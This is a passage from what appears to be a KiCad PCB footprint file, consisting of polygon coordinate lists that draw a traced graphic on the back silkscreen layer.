(xy 18.768839 9.20099) (xy 19.024443 9.391547) (xy 19.316291 9.617887) (xy 19.614079 9.856824)
(xy 19.685 9.915065) (xy 19.949309 10.130376) (xy 20.289123 10.402867) (xy 20.679129 10.712486)
(xy 21.094013 11.039181) (xy 21.508462 11.362902) (xy 21.717 11.524642) (xy 22.443008 12.105695)
(xy 23.123054 12.688656) (xy 23.745054 13.261759) (xy 24.296922 13.813239) (xy 24.766575 14.331331)
(xy 25.141928 14.804272) (xy 25.260377 14.974287) (xy 25.4615 15.286527) (xy 25.588196 15.509537)
(xy 25.644768 15.653736) (xy 25.635519 15.729547) (xy 25.579898 15.748) (xy 25.444026 15.709108)
(xy 25.226235 15.599626) (xy 24.942105 15.430348) (xy 24.607215 15.212066) (xy 24.237145 14.955574)
(xy 23.847475 14.671665) (xy 23.453784 14.371131) (xy 23.07165 14.064765) (xy 22.722448 13.768446)
(xy 22.321184 13.407089) (xy 21.876136 12.990049) (xy 21.401663 12.532087) (xy 20.912128 12.047966)
(xy 20.42189 11.552448) (xy 19.945312 11.060295) (xy 19.496753 10.586269) (xy 19.090576 10.145132)
(xy 18.74114 9.751647) (xy 18.462807 9.420576) (xy 18.340293 9.263876) (xy 18.17571 9.031826)
(xy 18.099492 8.88824) (xy 14.242404 8.88824) (xy 14.37712 9.094562) (xy 14.5645 9.415337)
(xy 14.703027 9.692133) (xy 14.780809 9.903785) (xy 14.793388 9.98999) (xy 14.758984 10.036513)
(xy 14.665571 9.989394) (xy 14.523377 9.86146) (xy 14.342629 9.665537) (xy 14.133552 9.414453)
(xy 13.906375 9.121033) (xy 13.671322 8.798105) (xy 13.438623 8.458495) (xy 13.218502 8.115029)
(xy 13.021187 7.780535) (xy 12.996809 7.736683) (xy 12.885138 7.529002) (xy 12.802601 7.365626)
(xy 12.764469 7.277007) (xy 12.7635 7.271398) (xy -27.371745 7.271398) (xy -27.642403 7.501374)
(xy -28.009424 7.787628) (xy -28.443135 8.105865) (xy -28.934927 8.449691) (xy -29.285348 8.684714)
(xy -27.419923 8.684714) (xy -27.386531 8.561419) (xy -27.26835 8.419224) (xy -27.097703 8.288366)
(xy -26.90691 8.199083) (xy -26.897974 8.196412) (xy -26.706306 8.159299) (xy -26.47429 8.137963)
(xy -26.416 8.136308) (xy -26.13025 8.133162) (xy -26.3525 8.325665) (xy -26.640654 8.549766)
(xy -26.905132 8.707817) (xy -27.130577 8.794651) (xy -27.301633 8.805104) (xy -27.402942 8.734009)
(xy -27.419923 8.684714) (xy -29.285348 8.684714) (xy -29.476195 8.812712) (xy -30.058332 9.188533)
(xy -30.672731 9.570761) (xy -31.01975 9.780483) (xy -31.639088 10.15546) (xy -32.174316 10.489034)
(xy -32.620952 10.778127) (xy -32.974515 11.019659) (xy -33.230523 11.210553) (xy -33.384494 11.34773)
(xy -33.431946 11.42811) (xy -33.429282 11.435613) (xy -33.336565 11.47867) (xy -33.149685 11.492679)
(xy -32.897678 11.479434) (xy -32.609577 11.440731) (xy -32.314418 11.378365) (xy -32.256724 11.363109)
(xy -31.939793 11.257221) (xy -31.533078 11.090994) (xy -31.053919 10.872298) (xy -30.51966 10.609004)
(xy -30.020236 10.348022) (xy -29.625495 10.162958) (xy -29.175895 9.99631) (xy -28.69328 9.852116)
(xy -28.199494 9.734412) (xy -27.71638 9.647233) (xy -27.265784 9.594616) (xy -26.869547 9.580598)
(xy -26.549515 9.609215) (xy -26.353063 9.670407) (xy -26.221036 9.756578) (xy -26.164037 9.85346)
(xy -26.188104 9.972883) (xy -26.299276 10.126677) (xy -26.50359 10.326672) (xy -26.807084 10.584698)
(xy -26.82875 10.602423) (xy -27.260618 10.942789) (xy -27.689546 11.257996) (xy -28.101349 11.539398)
(xy -28.481837 11.778352) (xy -28.816822 11.966212) (xy -29.092117 12.094334) (xy -29.293534 12.154074)
(xy -29.374081 12.153238) (xy -29.515142 12.156698) (xy -29.578195 12.23427) (xy -29.554207 12.353427)
(xy -29.459864 12.462118) (xy -29.330156 12.53944) (xy -29.173634 12.560484) (xy -29.010608 12.546065)
(xy -28.606111 12.456167) (xy -28.127544 12.288173) (xy -27.593481 12.05086) (xy -27.022491 11.753004)
(xy -26.433146 11.403381) (xy -26.019815 11.132671) (xy -25.716687 10.92614) (xy -25.414174 10.720151)
(xy -25.146583 10.538056) (xy -24.94822 10.403208) (xy -24.942122 10.399067) (xy -24.720697 10.265649)
(xy -24.50413 10.162736) (xy -24.356432 10.116628) (xy -24.206594 10.106879) (xy -24.086516 10.150241)
(xy -23.946868 10.267433) (xy -23.909436 10.304365) (xy -23.767088 10.468865) (xy -23.700573 10.620018)
(xy -23.713459 10.78153) (xy -23.809313 10.977105) (xy -23.991704 11.230446) (xy -24.062214 11.319248)
(xy -24.518305 11.838485) (xy -25.064973 12.373122) (xy -25.708673 12.928538) (xy -26.455861 13.510116)
(xy -27.312992 14.123236) (xy -27.90825 14.525411) (xy -28.476876 14.904673) (xy -28.943692 15.221837)
(xy -29.314949 15.48153) (xy -29.596895 15.688381) (xy -29.795781 15.847016) (xy -29.917855 15.962062)
(xy -29.969368 16.038148) (xy -29.972 16.05353) (xy -29.92214 16.120664) (xy -29.780644 16.120004)
(xy -29.55964 16.056983) (xy -29.271257 15.937033) (xy -28.927623 15.765587) (xy -28.540866 15.548078)
(xy -28.123113 15.289938) (xy -27.823198 15.091016) (xy -27.485928 14.866244) (xy -27.238268 14.714669)
(xy -27.069634 14.631445) (xy -26.969445 14.611726) (xy -26.927116 14.650666) (xy -26.924 14.679284)
(xy -26.969874 14.758306) (xy -27.100378 14.910986) (xy -27.304831 15.127043) (xy -27.572558 15.396199)
(xy -27.892879 15.708171) (xy -28.255115 16.052682) (xy -28.648589 16.41945) (xy -29.062623 16.798195)
(xy -29.486537 17.178639) (xy -29.87675 17.521887) (xy -30.526045 18.091436) (xy -31.079305 18.586581)
(xy -31.540434 19.011285) (xy -31.913334 19.369513) (xy -32.201908 19.665229) (xy -32.410059 19.902397)
(xy -32.54169 20.08498) (xy -32.600703 20.216944) (xy -32.598995 20.286866) (xy -32.496637 20.394213)
(xy -32.307224 20.468241) (xy -32.068738 20.497894) (xy -31.906865 20.488338) (xy -31.62042 20.419642)
(xy -31.302345 20.282876) (xy -30.930687 20.067733) (xy -30.730444 19.936062) (xy -30.384053 19.720819)
(xy -30.071597 19.578234) (xy -29.740021 19.488437) (xy -29.402384 19.438643) (xy -29.123271 19.399986)
(xy -28.882865 19.344228) (xy -28.66688 19.259919) (xy -28.461031 19.135606) (xy -28.251034 18.959836)
(xy -28.022601 18.721159) (xy -27.761448 18.408121) (xy -27.453289 18.009271) (xy -27.20519 17.677243)
(xy -26.716912 17.044022) (xy -26.27412 16.524227) (xy -25.872799 16.114328) (xy -25.50893 15.810796)
(xy -25.178499 15.610102) (xy -24.877489 15.508715) (xy -24.720783 15.494001) (xy -24.600502 15.507748)
(xy -24.534492 15.556737) (xy -24.526403 15.652588) (xy -24.579881 15.806922) (xy -24.698576 16.031359)
(xy -24.886135 16.337519) (xy -25.079025 16.63512) (xy -25.37163 17.091257) (xy -25.585815 17.452579)
(xy -25.722011 17.723824) (xy -25.780653 17.909731) (xy -25.762173 18.01504) (xy -25.667005 18.044489)
(xy -25.49558 18.002817) (xy -25.248332 17.894763) (xy -25.191515 17.86646) (xy -24.874025 17.696976)
(xy -24.563255 17.510796) (xy -24.250736 17.300217) (xy -23.927995 17.057539) (xy -23.586563 16.775062)
(xy -23.217967 16.445083) (xy -22.813736 16.059901) (xy -22.365401 15.611817) (xy -21.864489 15.093129)
(xy -21.302531 14.496135) (xy -20.671053 13.813136) (xy -20.36316 13.476997) (xy -19.761224 12.821823)
(xy -19.24045 12.262578) (xy -18.799891 11.798302) (xy -18.438602 11.428037) (xy -18.155637 11.150821)
(xy -17.95005 10.965697) (xy -17.820895 10.871703) (xy -17.782489 10.8585) (xy -17.731422 10.904552)
(xy -17.755179 11.034522) (xy -17.845661 11.236138) (xy -17.974561 11.46175) (xy -16.514405 11.46175)
(xy -16.218918 10.860642) (xy -16.04593 10.514133) (xy -15.915286 10.26777) (xy -15.816973 10.105994)
(xy -15.740977 10.013244) (xy -15.677286 9.973962) (xy -15.645447 9.9695) (xy -15.576607 10.023721)
(xy -15.5575 10.117364) (xy -15.601208 10.279972) (xy -15.722063 10.505763) (xy -15.904669 10.770948)
(xy -16.133628 11.051737) (xy -16.233587 11.161862) (xy -16.458798 11.402367) (xy -5.712316 11.402367)
(xy -5.688884 11.102657) (xy -5.647081 10.942126) (xy -5.531441 10.726845) (xy -5.390032 10.58779)
(xy -5.245235 10.533225) (xy -5.119436 10.571414) (xy -5.035016 10.710622) (xy -5.033585 10.715625)
(xy -4.994455 10.962505) (xy -4.98976 11.260372) (xy -5.016045 11.561882) (xy -5.069859 11.819692)
(xy -5.123746 11.951735) (xy -5.265223 12.12809) (xy -5.406209 12.183928) (xy -5.534581 12.118647)
(xy -5.621073 11.97638) (xy -5.689184 11.714595) (xy -5.712316 11.402367) (xy -16.458798 11.402367)
(xy -16.514405 11.46175) (xy -17.974561 11.46175) (xy -17.994773 11.497126) (xy -18.194416 11.805212)
(xy -18.436494 12.148122) (xy -18.712909 12.513582) (xy -19.015564 12.889317) (xy -19.336362 13.263055)
(xy -19.458149 13.3985) (xy -19.675268 13.645393) (xy -19.87639 13.889409) (xy -20.035484 14.098138)
(xy -20.11152 14.211958) (xy -20.190803 14.359404) (xy -20.236773 14.495578) (xy -20.256104 14.660205)
(xy -20.255466 14.89301) (xy -20.250157 15.037458) (xy -20.231294 15.615754) (xy -20.230526 15.743649)
(xy -18.282434 15.743649) (xy -18.254526 15.514066) (xy -18.190036 15.271737) (xy -18.098935 15.067155)
(xy -18.096613 15.063307) (xy -17.979349 14.901305) (xy -17.899618 14.860015) (xy -17.859151 14.938299)
(xy -17.859678 15.135022) (xy -17.867705 15.21372) (xy -17.914461 15.471746) (xy -17.984299 15.695429)
(xy -18.066365 15.865688) (xy -18.149805 15.963444) (xy -18.223766 15.969616) (xy -18.263792 15.909995)
(xy -18.282434 15.743649) (xy -20.230526 15.743649) (xy -20.228452 16.088656) (xy -20.24282 16.476903)
(xy -20.275586 16.801231) (xy -20.327938 17.082377) (xy -20.377991 17.268275) (xy -20.588632 17.835877)
(xy -20.613735 17.888022) (xy -19.4945 17.888022) (xy -19.435165 17.594977) (xy -19.266024 17.295259)
(xy -19.039074 17.047434) (xy -18.83671 16.891072) (xy -18.692832 16.844817) (xy -18.601171 16.909525)
(xy -18.555461 17.086051) (xy -18.552849 17.113779) (xy -18.576715 17.49145) (xy -18.711286 17.816028)
(xy -18.894245 18.028111) (xy -19.111396 18.176311) (xy -19.29126 18.216293) (xy -19.421085 18.151033)
(xy -19.488122 17.983507) (xy -19.4945 17.888022) (xy -20.613735 17.888022) (xy -20.897175 18.476792)
(xy -21.301087 19.18661) (xy -21.797834 19.960915) (xy -22.384881 20.795295) (xy -22.466461 20.906271)
(xy -22.896184 21.500003) (xy -23.321129 22.109511) (xy -23.730545 22.717948) (xy -24.113685 23.308468)
(xy -24.4598 23.864224) (xy -24.758141 24.368368) (xy -24.997961 24.804052) (xy -25.149363 25.111489)
(xy -25.267796 25.390544) (xy -25.32404 25.574683) (xy -25.32026 25.67848) (xy -25.258622 25.716506)
(xy -25.23944 25.7175) (xy -25.091495 25.680907) (xy -24.862501 25.579043) (xy -24.572293 25.423784)
(xy -24.240704 25.227002) (xy -23.887569 25.000574) (xy -23.532724 24.756373) (xy -23.196003 24.506275)
(xy -23.130472 24.454925) (xy -22.884529 24.23544) (xy -22.582437 23.921281) (xy -22.221468 23.509316)
(xy -21.798892 22.996414) (xy -21.311978 22.379444) (xy -21.241546 22.2885) (xy -20.711309 21.606689)
(xy -20.244913 21.017251) (xy -19.832367 20.50923) (xy -19.46368 20.071665) (xy -19.128859 19.693598)
(xy -18.817913 19.364072) (xy -18.520849 19.072127) (xy -18.227676 18.806805) (xy -17.928403 18.557148)
(xy -17.622549 18.319372) (xy -17.195513 17.986144) (xy -16.856867 17.694423) (xy -16.584819 17.422562)
(xy -16.357576 17.148914) (xy -16.167582 16.874213) (xy -15.9826 16.607819) (xy -15.836589 16.442362)
(xy -15.735609 16.379002) (xy -15.685723 16.418899) (xy -15.69299 16.563213) (xy -15.757565 16.79575)
(xy -15.82065 16.958306) (xy -15.930294 17.214489) (xy -16.077262 17.543839) (xy -16.252322 17.925896)
(xy -16.44624 18.340198) (xy -16.602929 18.669) (xy -16.857233 19.200942) (xy -17.059155 19.629924)
(xy -17.213152 19.966561) (xy -17.323679 20.221465) (xy -17.395192 20.40525) (xy -17.432148 20.528528)
(xy -17.439002 20.601913) (xy -17.426694 20.630974) (xy -17.398031 20.63789) (xy -17.353377 20.607876)
(xy -17.287191 20.532325) (xy -17.193935 20.402632) (xy -17.068069 20.210191) (xy -16.904053 19.946397)
(xy -16.696349 19.602644) (xy -16.439417 19.170327) (xy -16.127718 18.640839) (xy -15.94486 18.328873)
(xy -15.782177 18.072983) (xy -15.607511 17.833021) (xy -15.452018 17.650948) (xy -15.414443 17.614498)
(xy -15.294492 17.511172) (xy -15.190438 17.447613) (xy -15.066545 17.414169) (xy -14.887076 17.401183)
(xy -14.616791 17.399001) (xy -14.336824 17.39505) (xy -14.151636 17.379034) (xy -14.029139 17.344704)
(xy -13.937244 17.28581) (xy -13.909637 17.261294) (xy -13.817025 17.151835) (xy -13.71482 16.983519)
(xy -13.599775 16.747973) (xy -13.468641 16.436825) (xy -13.318172 16.041702) (xy -13.14512 15.554232)
(xy -12.946237 14.966042) (xy -12.718276 14.268759) (xy -12.571876 13.812369) (xy -12.415128 13.361885)
(xy -12.251284 12.964322) (xy -12.088175 12.634192) (xy -11.933631 12.386009) (xy -11.795485 12.234286)
(xy -11.697574 12.192) (xy -11.650154 12.252025) (xy -11.639041 12.428998) (xy -11.663899 12.718269)
(xy -11.724392 13.115188) (xy -11.789227 13.462) (xy -11.978097 14.208314) (xy -12.253294 15.00375)
(xy -12.600929 15.819427) (xy -13.007109 16.626462) (xy -13.457943 17.395973) (xy -13.939539 18.099075)
(xy -14.15012 18.370699) (xy -14.458156 18.771279) (xy -14.669879 19.090875) (xy -14.785885 19.330584)
(xy -14.806769 19.491507) (xy -14.78384 19.540301) (xy -14.644703 19.613757) (xy -14.438402 19.597601)
(xy -14.184634 19.494872) (xy -14.075477 19.431001) (xy -13.849472 19.297748) (xy -13.705651 19.24705)
(xy -13.626275 19.283082) (xy -13.5936 19.410017) (xy -13.589 19.545451) (xy -13.606852 19.712346)
(xy -13.662209 19.959029) (xy -13.757777 20.295044) (xy -13.89626 20.729937) (xy -14.070277 21.244076)
(xy -14.360521 22.086508) (xy -14.611262 22.820479) (xy -14.825341 23.45726) (xy -15.005598 24.008121)
(xy -15.154872 24.484336) (xy -15.276003 24.897176) (xy -15.371831 25.257912) (xy -15.445196 25.577816)
(xy -15.498938 25.86816) (xy -15.535897 26.140216) (xy -15.558912 26.405254) (xy -15.570824 26.674548)
(xy -15.574472 26.959368) (xy -15.573314 27.20975) (xy -15.566744 27.57467) (xy -15.554881 27.911213)
(xy -15.539137 28.191467) (xy -15.520923 28.387517) (xy -15.510688 28.448) (xy -15.433326 28.626529)
(xy -15.315676 28.685173) (xy -15.158249 28.624316) (xy -14.961553 28.444343) (xy -14.726099 28.145638)
(xy -14.452396 27.728584) (xy -14.364715 27.583498) (xy -14.221802 27.331001) (xy -14.031524 26.97588)
(xy -13.800106 26.530649) (xy -13.533771 26.007825) (xy -13.238744 25.419922) (xy -12.921248 24.779457)
(xy -12.587508 24.098944) (xy -12.243748 23.390898) (xy -11.896192 22.667837) (xy -11.551065 21.942274)
(xy -11.399837 21.62175) (xy -11.111683 21.015028) (xy -10.828115 20.428597) (xy -10.555706 19.875343)
(xy -10.301028 19.368155) (xy -10.070654 18.919921) (xy -9.871154 18.543528) (xy -9.709103 18.251864)
(xy -9.591071 18.057817) (xy -9.559273 18.012546) (xy -9.435384 17.921501) (xy -9.307644 17.946772)
(xy -9.197592 18.08024) (xy -9.16346 18.161774) (xy -9.097346 18.481524) (xy -9.078195 18.901099)
(xy -9.103665 19.403286) (xy -9.171411 19.970873) (xy -9.27909 20.586648) (xy -9.424359 21.233397)
(xy -9.604873 21.893909) (xy -9.722934 22.270859) (xy -9.828497 22.612947) (xy -9.883141 22.855344)
(xy -9.885665 23.015224) (xy -9.834867 23.10976) (xy -9.729548 23.156125) (xy -9.660346 23.16621)
(xy -9.34836 23.135487) (xy -9.056478 22.981252) (xy -8.78402 22.702879) (xy -8.530305 22.299745)
(xy -8.384883 21.9933) (xy -8.086787 21.206562) (xy -7.883114 20.45298) (xy -7.775462 19.743375)
(xy -7.765433 19.088568) (xy -7.854626 18.499381) (xy -7.863268 18.465975) (xy -8.026926 17.64654)
(xy -8.108664 16.73051) (xy -8.108439 15.718373) (xy -8.108356 15.71625) (xy -8.072853 15.121155)
(xy -8.017302 14.648637) (xy -7.941154 14.29578) (xy -7.843864 14.059668) (xy -7.782728 13.980062)
(xy -7.707911 13.92151) (xy -7.639597 13.932867) (xy -7.539765 14.026371) (xy -7.498668 14.071514)
(xy -7.340636 14.306221) (xy -7.184237 14.646624) (xy -7.033841 15.071446) (xy -6.893813 15.559411)
(xy -6.768523 16.089243) (xy -6.662339 16.639667) (xy -6.579628 17.189408) (xy -6.524759 17.717188)
(xy -6.502099 18.201734) (xy -6.516017 18.621767) (xy -6.533584 18.77224) (xy -6.581048 19.031976)
(xy -6.638922 19.264994) (xy -6.675396 19.3675) (xy -3.77314 19.3675) (xy -3.766097 18.923163)
(xy -3.739235 18.581576) (xy -3.687402 18.319337) (xy -3.605442 18.113046) (xy -3.488202 17.939301)
(xy -3.448487 17.893449) (xy -3.331582 17.794445) (xy -3.252406 17.813754) (xy -3.193099 17.954625)
(xy -3.176285 18.079175) (xy -3.162884 18.305035) (xy -3.15279 18.613799) (xy -3.145897 18.987062)
(xy -3.142097 19.406418) (xy -3.141285 19.853461) (xy -3.143354 20.309785) (xy -3.148197 20.756983)
(xy -3.155709 21.17665) (xy -3.165782 21.550381) (xy -3.178311 21.859768) (xy -3.193188 22.086406)
(xy -3.210307 22.21189) (xy -3.217821 22.229699) (xy -3.279443 22.226055) (xy -3.348604 22.113064)
(xy -3.421968 21.907912) (xy -3.496201 21.627787) (xy -3.567969 21.289874) (xy -3.633937 20.91136)
(xy -3.690771 20.509432) (xy -3.735135 20.101276) (xy -3.763696 19.704079) (xy -3.77314 19.3675)
(xy -6.675396 19.3675) (xy -6.695071 19.422794) (xy -6.697645 19.427897) (xy -6.765678 19.583637)
(xy -6.82386 19.776818) (xy -6.87564 20.026301) (xy -6.924464 20.350946) (xy -6.973782 20.769615)
(xy -7.0126 21.150825) (xy -7.067056 21.771202) (xy -7.113971 22.427743) (xy -7.153105 23.105559)
(xy -7.184216 23.789761) (xy -7.207064 24.46546) (xy -7.221408 25.117766) (xy -7.227006 25.731792)
(xy -7.223618 26.292647) (xy -7.211002 26.785443) (xy -7.188917 27.19529) (xy -7.157122 27.5073)
(xy -7.118572 27.696794) (xy -6.997529 27.983343) (xy -6.856072 28.145061) (xy -6.697754 28.181836)
(xy -6.526127 28.093555) (xy -6.344744 27.880105) (xy -6.250346 27.724315) (xy -6.149537 27.531222)
(xy -6.064445 27.338122) (xy -5.992205 27.129645) (xy -5.929952 26.890422) (xy -5.874819 26.605085)
(xy -5.823943 26.258264) (xy -5.774458 25.83459) (xy -5.723499 25.318694) (xy -5.6682 24.695207)
(xy -5.653555 24.523003) (xy -5.614705 24.145152) (xy -5.565064 23.783893) (xy -5.50885 23.460306)
(xy -5.450284 23.19547) (xy -5.393587 23.010465) (xy -5.342978 22.926368) (xy -5.333334 22.9235)
(xy -5.289803 22.981374) (xy -5.215682 23.143453) (xy -5.117287 23.392425) (xy -5.000937 23.710975)
(xy -4.872949 24.081792) (xy -4.739641 24.48756) (xy -4.607329 24.910969) (xy -4.603445 24.92375)
(xy -4.441324 25.454502) (xy -4.308581 25.880523) (xy -4.199253 26.219065) (xy -4.107379 26.487383)
(xy -4.026997 26.702728) (xy -3.952144 26.882353) (xy -3.876858 27.043512) (xy -3.857365 27.08275)
(xy -3.592099 27.561103) (xy -3.314255 27.97071) (xy -3.034316 28.30028) (xy -2.762771 28.538524)
(xy -2.510103 28.67415) (xy -2.353555 28.702001) (xy -2.212604 28.640004) (xy -2.059777 28.458283)
(xy -1.898045 28.163245) (xy -1.730381 27.761295) (xy -1.559754 27.258839) (xy -1.389138 26.662281)
(xy -1.365646 26.572487) (xy -1.266461 26.181021) (xy -1.183748 25.829047) (xy -1.116241 25.500328)
(xy -1.06267 25.178625) (xy -1.02177 24.847702) (xy -0.992272 24.491322) (xy -0.97291 24.093247)
(xy -0.962415 23.637241) (xy -0.959521 23.107066) (xy -0.962959 22.486485) (xy -0.971463 21.759261)
(xy -0.97424 21.55825) (xy -0.984489 20.922039) (xy -0.997249 20.275263) (xy -1.011924 19.640022)
(xy -1.027917 19.038411) (xy -1.044631 18.492528) (xy -1.06147 18.02447) (xy -1.077837 17.656335)
(xy -1.081396 17.5895) (xy -1.107892 17.049142) (xy -1.129352 16.484543) (xy -1.145738 15.911009)
(xy -1.157011 15.343845) (xy -1.163135 14.798358) (xy -1.164072 14.289855) (xy -1.159782 13.83364)
(xy -1.15023 13.44502) (xy -1.135375 13.139301) (xy -1.115182 12.931789) (xy -1.093141 12.842875)
(xy -0.997027 12.722866) (xy -0.909162 12.725008) (xy -0.821052 12.851208) (xy -0.794815 12.909909)
(xy -0.747103 13.043428) (xy -0.705724 13.206445) (xy -0.701025 13.233115) (xy 5.216693 13.233115)
(xy 5.252896 13.153674) (xy 5.341085 13.188881) (xy 5.485077 13.337473) (xy 5.489022 13.342151)
(xy 5.616514 13.525469) (xy 5.770637 13.794272) (xy 5.935084 14.114525) (xy 6.044017 14.346649)
(xy 14.097 14.346649) (xy 14.131434 14.19844) (xy 14.234249 14.156539) (xy 14.404712 14.220707)
(xy 14.642091 14.390705) (xy 14.87876 14.601867) (xy 15.199233 14.933399) (xy 15.439322 15.239462)
(xy 15.591976 15.508338) (xy 15.650142 15.72831) (xy 15.629715 15.849481) (xy 15.556261 15.964006)
(xy 15.460456 15.992338) (xy 15.312994 15.935984) (xy 15.202519 15.871459) (xy 15.028303 15.73215)
(xy 14.827576 15.522909) (xy 14.619503 15.270171) (xy 14.423255 15.000376) (xy 14.257997 14.73996)
(xy 14.142898 14.515361) (xy 14.097125 14.353016) (xy 14.097 14.346649) (xy 6.044017 14.346649)
(xy 6.093548 14.452192) (xy 6.229722 14.773238) (xy 6.327298 15.043626) (xy 6.358057 15.15595)
(xy 6.387735 15.385799) (xy 6.382105 15.614806) (xy 6.346886 15.812224) (xy 6.287798 15.947306)
(xy 6.21056 15.989304) (xy 6.203365 15.987603) (xy 6.128163 15.912688) (xy 6.025878 15.737352)
(xy 5.904729 15.483172) (xy 5.772933 15.171721) (xy 5.638706 14.824577) (xy 5.510268 14.463313)
(xy 5.395835 14.109505) (xy 5.303624 13.78473) (xy 5.241853 13.51056) (xy 5.22866 13.428471)
(xy 5.216693 13.233115) (xy -0.701025 13.233115) (xy -0.669881 13.409871) (xy -0.638774 13.664617)
(xy -0.611605 13.981594) (xy -0.587577 14.371712) (xy -0.56589 14.845882) (xy -0.545746 15.415014)
(xy -0.526347 16.09002) (xy -0.508155 16.8275) (xy -0.486575 17.690304) (xy -0.464633 18.432933)
(xy -0.441897 19.062214) (xy -0.417935 19.584972) (xy -0.392315 20.008035) (xy -0.364604 20.338226)
(xy -0.334369 20.582373) (xy -0.301178 20.7473) (xy -0.2646 20.839835) (xy -0.253096 20.854305)
(xy -0.174548 20.873415) (xy -0.103339 20.76861) (xy -0.040017 20.542794) (xy 0.014869 20.198872)
(xy 0.060772 19.739748) (xy 0.097143 19.168325) (xy 0.107418 18.944747) (xy 0.149665 17.93875)
(xy 0.357148 18.89125) (xy 0.500632 19.591099) (xy 0.610335 20.230742) (xy 0.69037 20.847939)
(xy 0.744853 21.480449) (xy 0.777897 22.166031) (xy 0.793079 22.89175) (xy 0.801355 23.361558)
(xy 0.814621 23.780619) (xy 0.831937 24.130831) (xy 0.852369 24.394089) (xy 0.874978 24.552291)
(xy 0.879961 24.570612) (xy 0.965088 24.756891) (xy 1.094643 24.964108) (xy 1.146207 25.032493)
(xy 1.310088 25.263741) (xy 1.450854 25.528378) (xy 1.57599 25.846988) (xy 1.692984 26.240155)
(xy 1.80932 26.728464) (xy 1.872713 27.030128) (xy 2.005531 27.658994) (xy 2.127407 28.176002)
(xy 2.243475 28.595271) (xy 2.358872 28.930923) (xy 2.47873 29.197075) (xy 2.608187 29.40785)
(xy 2.752375 29.577366) (xy 2.823173 29.64372) (xy 3.062957 29.816141) (xy 3.271993 29.891329)
(xy 3.434189 29.864132) (xy 3.458326 29.847012) (xy 3.537918 29.76087) (xy 3.599687 29.640393)
(xy 3.645576 29.470538) (xy 3.677532 29.236258) (xy 3.697497 28.922508) (xy 3.707418 28.514244)
(xy 3.709239 27.99642) (xy 3.708933 27.90825) (xy 3.700811 27.307338) (xy 3.680442 26.709783)
(xy 3.646216 26.095235) (xy 3.596521 25.443342) (xy 3.529746 24.733753) (xy 3.444279 23.946116)
(xy 3.338509 23.060081) (xy 3.301661 22.76475) (xy 3.22372 22.136074) (xy 3.162633 21.617694)
(xy 3.117376 21.194175) (xy 3.086924 20.850077) (xy 3.070254 20.569963) (xy 3.066342 20.338396)
(xy 3.074162 20.139937) (xy 3.09269 19.959149) (xy 3.108473 19.853031) (xy 3.175923 19.549218)
(xy 3.270446 19.266147) (xy 3.380051 19.029356) (xy 3.492747 18.86438) (xy 3.596542 18.796756)
(xy 3.604694 18.796316) (xy 3.728846 18.82493) (xy 3.864754 18.915253) (xy 4.017576 19.075033)
(xy 4.192473 19.31202) (xy 4.394601 19.633965) (xy 4.62912 20.048618) (xy 4.901188 20.563727)
(xy 5.215964 21.187044) (xy 5.274057 21.30425) (xy 5.479814 21.713248) (xy 5.682033 22.102277)
(xy 5.869516 22.450759) (xy 6.031062 22.738118) (xy 6.155474 22.943775) (xy 6.207147 23.01875)
(xy 6.540295 23.352383) (xy 6.95825 23.598028) (xy 7.429442 23.743923) (xy 7.605565 23.786389)
(xy 7.758046 23.84678) (xy 7.894084 23.936927) (xy 8.020878 24.068663) (xy 8.145627 24.253819)
(xy 8.275529 24.504229) (xy 8.417784 24.831724) (xy 8.579591 25.248136) (xy 8.768148 25.765297)
(xy 8.919966 26.19375) (xy 9.223419 27.046433) (xy 9.493974 27.785095) (xy 9.735005 28.417427)
(xy 9.949888 28.95112) (xy 10.141996 29.393863) (xy 10.314704 29.753346) (xy 10.471387 30.03726)
(xy 10.615419 30.253294) (xy 10.750175 30.409139) (xy 10.783351 30.440077) (xy 10.924253 30.521165)
(xy 11.049867 30.490883)) (layer B.SilkS) (width 0.01))
(fp_poly (pts (xy 33.167845 14.027427) (xy 33.24412 13.900608) (xy 33.228276 13.749518) (xy 33.10245 13.577745)
(xy 32.879256 13.397756) (xy 32.571307 13.222019) (xy 32.544354 13.208979) (xy 32.250613 13.07457)
(xy 32.049444 12.998823) (xy 31.923419 12.976923) (xy 31.855112 13.004054) (xy 31.84613 13.016076)
(xy 31.85185 13.116998) (xy 31.934765 13.275645) (xy 32.074376 13.468591) (xy 32.250187 13.672412)
(xy 32.441698 13.863683) (xy 32.628411 14.01898) (xy 32.78983 14.114877) (xy 32.816059 14.124485)
(xy 33.005073 14.125317) (xy 33.167845 14.027427)) (layer B.SilkS) (width 0.01))
(fp_poly (pts (xy 0.650556 -8.670962) (xy 0.916733 -8.678634) (xy 1.112619 -8.696221) (xy 1.266549 -8.727184)
(xy 1.406859 -8.774988) (xy 1.509993 -8.819351) (xy 1.912898 -9.069485) (xy 2.244815 -9.420761)
(xy 2.502881 -9.867141) (xy 2.684231 -10.402584) (xy 2.786001 -11.021049) (xy 2.808294 -11.557)
(xy 2.762036 -12.218698) (xy 2.636583 -12.84588) (xy 2.440221 -13.42894) (xy 2.181236 -13.95827)
(xy 1.867916 -14.424266) (xy 1.508547 -14.817322) (xy 1.111417 -15.12783) (xy 0.684811 -15.346185)
(xy 0.237016 -15.462781) (xy -0.223681 -15.468013) (xy -0.515632 -15.410138) (xy -0.987394 -15.212841)
(xy -1.425273 -14.902242) (xy -1.814378 -14.49061) (xy -2.052978 -14.143561) (xy -2.300091 -13.62066)
(xy -2.468275 -13.025478) (xy -2.557508 -12.385245) (xy -2.56777 -11.727188) (xy -2.499039 -11.078538)
(xy -2.410888 -10.71338) (xy 0.08769 -10.71338) (xy 0.108518 -11.045064) (xy 0.228327 -11.375567)
(xy 0.426569 -11.664163) (xy 0.66675 -11.861227) (xy 0.926237 -11.961133) (xy 1.194245 -11.984446)
(xy 1.432285 -11.933051) (xy 1.596505 -11.815647) (xy 1.681792 -11.636947) (xy 1.73886 -11.369145)
(xy 1.767184 -11.04708) (xy 1.766239 -10.705592) (xy 1.735501 -10.379523) (xy 1.674445 -10.103712)
(xy 1.624154 -9.978985) (xy 1.489943 -9.80191) (xy 1.311958 -9.722086) (xy 1.076128 -9.737773)
(xy 0.768384 -9.847227) (xy 0.723932 -9.867521) (xy 0.408253 -10.066114) (xy 0.202156 -10.322094)
(xy 0.096602 -10.647476) (xy 0.08769 -10.71338) (xy -2.410888 -10.71338) (xy -2.351295 -10.466525)
(xy -2.124517 -9.918377) (xy -2.056316 -9.795938) (xy -1.728106 -9.348551) (xy -1.337437 -9.01174)
(xy -0.963145 -8.815118) (xy -0.798806 -8.755776) (xy -0.636011 -8.715055) (xy -0.445297 -8.689525)
